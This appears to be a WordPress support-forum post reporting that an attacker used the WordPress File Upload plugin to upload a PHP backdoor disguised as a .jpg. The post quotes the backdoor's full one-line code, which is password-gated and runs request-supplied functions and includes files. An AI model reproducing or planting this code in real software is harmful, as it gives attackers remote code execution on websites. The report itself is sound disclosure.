Potentially serious security issue
-
Someone was able to use the WordPress File Upload plugin to upload a file to our site with the filename “wfu_widget_logo.jpg”. The file was not a .jpg as named, it contained the following PHP code:
“<?php extract($_REQUEST);if(md5($b)!=’9546d40688a5eaae1de839b1d3566e1a’){die();}$c($f, $a);include_once $f; ?>”
For unfathomable reasons, WordPress File Upload deposits any guest uploads into it’s own root folder (/wp-content/plugins/wp-file-upload/lib) and regardless of the file name if there’s PHP code there then at the very least it will cause an error that takes your site down if there’s a code error, which is what happened to us. Worst case that code will be executed, as clearly that attacker intended in this case.
If this is even a remote possibility under some basic wordpress configuration I would think it would warrant a giant warning when you install the plugin at the very least. Ideally there would be something to prevent this.
-
The file was definitely uploaded through the plugin, it’s in the log.
Whatever function you’re using to verify the extension is obviously unsuitable. If you’re operating in a PHP environment then you’d think that checking a file for the string “<?php” if it’s anything other than a .php extension file would be the bare minimum! As an FYI, I did try uploading the file on the section of our site where we write the code, where we use the Codeigniter framework, and it correctly rejected the file, so if you’re looking for code that does the job right you need look no further than that.
Let’s be clear, there is at least one malicious actor out there that is actively searching for instances of your plug-in and uploading malicious code. In the face of that it is absolutely irrelevant if WordPress is to blame and the fact that you “use the default WordPress functions” absolves you of no blame now that you know it’s an issue. Like I said, at a minimum you should write some code to reject any file with “<?php” in it, that would take you 2 minutes to do and it’s almost malpractice not to have already done so.
If you provide the URL of your WordPress site with your plugin installed I’m happy to demo crashing it by uploading the file I described. Just let me know a good time so you can delete the file and bring it back up again quickly.
The topic ‘Potentially serious security issue’ is closed to new replies.
